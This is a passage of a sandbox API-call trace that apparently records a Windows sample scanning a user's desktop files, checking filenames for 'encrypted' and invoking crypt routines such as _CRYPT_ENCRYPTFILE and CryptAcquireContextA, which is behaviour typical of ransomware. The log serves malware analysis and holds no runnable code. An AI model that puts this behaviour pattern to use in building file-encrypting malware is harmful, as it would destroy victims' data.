lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c499ca0, ftCreationTime.dwHighDateTime=0x1d5c5db, ftLastAccessTime.dwLowDateTime=0x1b6ea610, ftLastAccessTime.dwHighDateTime=0x1d5c16d, ftLastWriteTime.dwLowDateTime=0x1b6ea610, ftLastWriteTime.dwHighDateTime=0x1d5c16d, nFileSizeHigh=0x0, nFileSizeLow=0x121b4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="mq1QQyNAiW1I2BdfJ.bmp", cAlternateFileName="MQ1QQY~1.BMP")) returned 0x7c20c0 [0030.737] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.737] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ClVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lVeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VeU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eU\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mq1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QQyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QyNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yNAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iW1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BdfJ.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.744] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.745] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.745] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.745] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.745] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.745] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.745] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.745] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.745] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c499ca0, ftCreationTime.dwHighDateTime=0x1d5c5db, ftLastAccessTime.dwLowDateTime=0x1b6ea610, ftLastAccessTime.dwHighDateTime=0x1d5c16d, ftLastWriteTime.dwLowDateTime=0x1b6ea610, ftLastWriteTime.dwHighDateTime=0x1d5c16d, nFileSizeHigh=0x0, nFileSizeLow=0x121b4, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="mq1QQyNAiW1I2BdfJ.bmp", cAlternateFileName="MQ1QQY~1.BMP")) returned 0x7c2240 [0030.745] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.746] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.746] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.746] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.746] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.754] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.754] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.754] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.754] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.755] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.755] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.755] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.755] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.755] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.755] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0030.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.756] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.756] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.756] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.756] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.757] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.757] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.757] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, 